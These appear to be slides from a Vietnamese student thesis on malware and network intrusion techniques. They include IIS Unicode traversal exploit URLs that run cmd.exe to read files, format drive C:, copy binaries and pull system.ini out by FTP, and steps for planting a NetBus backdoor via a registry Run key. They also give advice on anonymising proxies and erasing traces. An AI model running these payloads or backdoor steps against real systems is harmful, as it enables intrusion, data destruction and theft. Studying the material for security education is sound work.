Mô tả:
BỘ GIÁO DỤC VÀ ĐÀO TẠO
TRƯỜNG ĐH DLHP
BÁO CÁO ĐỒ ÁN
NGÀNH CÔNG NGHỆ THÔNG TIN
Đề tài:
TÌM HIỂU MỘT SỐ PHẦN MỀM PHÁ HOẠI &
CÁC GIẢI PHÁP XÂM NHẬP MẠNG DÙNG RIÊNG
CÓ KẾT NỐI INTERNET
Giáo viên hƣớng dẫn: TS. Hồ Văn Canh
Sinh viên
: Vũ Thị Thu Hằng
Lớp
: CT702
1
NỘI DUNG CHÍNH
Chƣơng 1: MỘT SỐ PHƢƠNG PHÁP TẤN CÔNG
VÀ KỸ THUẬT XÂM NHẬP MẠNG
Chƣơng 2: MỘT SỐ NGUYÊN TẮC TẤN CÔNG
TRÊN MẠNG
Chƣơng 3: PHÂN TÍCH MỘT SỐ PHẦN MỀM MẪU
Chƣơng 4: MỘT SỐ GIẢI PHÁP CỤ THỂ
TẤN CÔNG TRÊN MẠNG MÁY TÍNH
2
Chương 1: MỘT SỐ PHƢƠNG PHÁP TẤN CÔNG
VÀ KỸ THUẬT XÂM NHẬP MẠNG
Thực trạng tấn công của tội phạm trên mạng
Các phƣơng pháp tấn công
Các kỹ thuật xâm nhập mạng
3
Thực trạng tấn công của tội phạm trên mạng
Phần lớn các cuộc tấn công trên mạng đƣợc
thực hiện thông qua việc sử dụng một hoặc
nhiều công cụ phần mềm.
Phần mềm phá hoại
Các vụ tấn công trên mạng ngày càng gia
tăng cả về quy mô và tính chất nguy hiểm.
Những kẻ viết virus có thể gia tăng khả năng
điều khiển lên virus của mình sau khi đã phát tán
chúng trên mạng.
4
Các phƣơng pháp tấn công
Tấn công trực tiếp
Nghe trộm
Giả mạo địa chỉ
Vô hiệu hoá các chức năng của hệ thống mục tiêu
Sử dụng lỗi của ngƣời quản trị hệ thống
5
Các kỹ thuật xâm nhập mạng
Rình mò (Snooping)
Đánh lừa (Spoofing)
Điệp viên (Agent)
6
Chƣơng 2: MỘT SỐ NGUYÊN TẮC TẤN CÔNG
TRÊN MẠNG
Phát hiện điểm yếu trong cơ chế bảo mật của đối phƣơng
Triệt để lợi dụng cửa sau để tấn công
Tận dụng các công cụ sẵn có
Khai thác tối đa điểm yếu của mục tiêu tấn công,
đặc biệt các lỗ hổng bảo mật của hệ thống và các dịch vụ
Nguyên tắc an toàn
Nguyên tắc phối hợp tấn công
7
Phát hiện điểm yếu trong cơ chế bảo mật
của đối phƣơng
Một hệ thống đảm bảo ANAT máy tính gồm :
Yếu tố tổ chức.
Yếu tố kỹ thuật, công nghệ.
Có hai hƣớng tiếp cận để tìm các lỗ hổng bảo mật:
Từ góc độ chiến thuật
Từ góc độ kỹ thuật.
Một số diễn đàn trao đổi về lỗi bảo mật:
http://packetstorm.secuify,
http://www.hackerVN.net
http://www.tlsecurity.net,
8
Triệt để lợi dụng cửa sau để tấn công
Việc đột nhập vào một hệ thống máy tính nào đó
nói chung là rất khó khăn, vì thế sau khi đột nhập
ngƣời ta muốn để lại một công cụ nào đó giúp dễ
dàng xâm nhập trong những lần sau.
Backdoor / Trojan.
Nguyên tắc hoạt động của Backdoor
Máy
tấn
công
Giao tiếp bình thƣờng
Máy
đích
Giao tiếp cửa sau
Back
Back
Hình 3.1.1:Mô hình hoạt động của backdoor
9
Tận dụng các công cụ sẵn có
Sử dụng các công cụ để cấy Trojan lên một máy
khác thông qua chia sẻ tài nguyên trên máy đó:
Công cụ bẻ khóa chia sẻ Passware Kit
(http://www.LostPassword.com).
Copy file server của Netbus 1.7 (patch.exe) vào
thƣ mục bất kỳ ở ổ C:
Sử dụng regedit.exe của Windows để nạp và sửa
đổi Registry máy đó (Remote Registry Service)
10
Tận dụng các công cụ sẵn có
Thêm vào đó một khóa ở
HKEY_CURRENT_USER\Software\Microsoft\Wi
ndows\Current\Version\Run hoặc
HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\Current\Version\Run để chạy patch.exe:
Value type: String
Value name: Patch
Value data C:\windows\patch.exe
11
Khai thác tối đa điểm yếu của mục tiêu tấn công,
đặc biệt các lỗ hổng bảo mật của hệ thống và các dịch vụ
Phƣơng pháp tấn công IIS server bằng cách lợi
dụng lỗi Unicode “dot dot directory traversal attack”
(tấn công bằng cách lần ngƣợc thƣ mục do lỗi “dot
dot”).
http://www.iisaffected.com/scripts/..%c1%1c../winnt/syste
m32/cmd.exe?/c+dir+c:\
Thay xâu con “../”, “..\” bởi xâu unicode chứa một
đoạn mã hóa rất dài của ký tự “/” “\” nhƣ “%c1%1c”,
“..c0%f9”…
12
Khai thác tối đa điểm yếu của mục tiêu tấn công,
đặc biệt các lỗ hổng bảo mật của hệ thống và các dịch vụ
Khi thực thi, xâu “%c1%1c” đƣợc dịch trở lại
nguyên dạng ký tự “/”.
http://www.iisaffected.com/scripts/../../winnt/system32/cm
d.exe?/c+dir+c:\
Để xem nội dung file autoexec.bat:
http://www.iisaffected.com/scripts/..%c1%1c../winnt/syste
m32/cmd.exe?/c+type+c:\autoexec .bat
Để format lại ổ đĩa C:
http://www.iisaffected.com/scripts/..%c1%1c../winnt/syste
m32/cmd.exe?/c+format+c:\+/q
13
Khai thác tối đa điểm yếu của mục tiêu tấn công,
đặc biệt các lỗ hổng bảo mật của hệ thống và các dịch vụ
Cũng có thể chiếm quyền ghi đĩa và thực hiện sửa
đổi, tạo mới file trên server:
+ Bƣớc 1: Tạo một bản sao mới cmd1.exe của trình
thông dịch lệnh DOS:
http://www.iisaffected.com/scripts/..%c1%1c../winnt/syste
m32/cmd.exe?/c+copy+c:\winnt/system32/cmd.exe+c/win
nt/system32/cmd1.exe
+ Bƣớc 2: Ghi thêm một số lệnh vào file autoexec.bat:
http://www.iisaffected.com/scripts/..%c1%1c../winnt/syste
m32/cmd.exe?/c+echo+>>+c:\autoexec.bat+@echo+Hihi
14
Nguyên tắc an toàn
Sử dụng các procxy vô danh (Anonymous Proxy
Server).
Gửi yêu cầu
Máy của ta
Proxy
Máy đối
Gửi yêu cầu
phƣơng
Trả lời
Trả lời
Hình 3.5.1: Mô hình giao tiếp giữa hai máy thông qua proxy.
Để luôn có những thông tin về các proxy miễn phí, có thể
thƣờng xuyên truy cập các trang web
http://www.blackcode.com, http://www.freeproxies.com.
Sử dụng một số chƣơng trình nhằm tạo ra các proxy ảo
ngay trên máy của mình, nhƣ Anomity 4 proxy.
15
Nguyên tắc phối hợp tấn công
Ngụy trang
Khám phá điểm yếu, lỗ hổng bảo mật
trong hệ thống mục tiêu
Sử dụng các công cụ để khai thác các
điểm yếu của hệ thống mục tiêu
Tiến hành các biện pháp tấn công,
thu thập thông tin
Tạo đƣờng ngầm (cửa sau),
cài cắm “điệp viên” nếu có thể
Xóa dấu vết
Hình 3.6.1: Sơ đồ thứ tự áp dụng các nguyên lý tấn công
16
Chƣơng 3: PHÂN TÍCH MỘT SỐ PHẦN MỀM MẪU
NETBUS
17
Chƣơng 3: PHÂN TÍCH MỘT SỐ PHẦN MỀM MẪU
WS_Ping ProPack (http://www.ipswitch.com)
18
Chƣơng 4: MỘT SỐ GIẢI PHÁP CỤ THỂ
TẤN CÔNG TRÊN MẠNG MÁY TÍNH
Tấn công máy mục tiêu bằng cách giành quyền điều
khiển hệ thống đó.
HTTP (HypeTtext Transfer Protocol – giao thức
truyền siêu văn bản)
Giao thức TFTP (Trivial File Transfer Protocol –
giao thức truyền file đơn giản)
Giao thức NetBIOS (Network Basic Input/Output
System)
Kết hợp công cụ quét tài nguyên đƣợc chia sẻ và
công cụ bẻ mật khẩu
19
Cách download và upload file trên IIS
mắc lỗi Unicode
Khi cài IIS phiên bản từ 4.0 trở lên, FTP server cho phép
user truy cập vào thƣ mục \inetpub\ftoproot\ và download
các file từ đó:
+ Bƣớc 1: Copy file download (giả sử là file
c:\system.ini) vào thƣ mục \inetpub\ftoproot\ bằng URL:
http://www.iisaffected.com/scripts/..%c1%1c../winnt/syste
m32/cmd.exe?/c+copy+c:\system.ini+c:\inetpub\ftoproot\
+ Bƣớc 2: Sử dụng FTP vô danh đăng nhập vào máy
tính đích download file system.ini về.
20
- Xem thêm -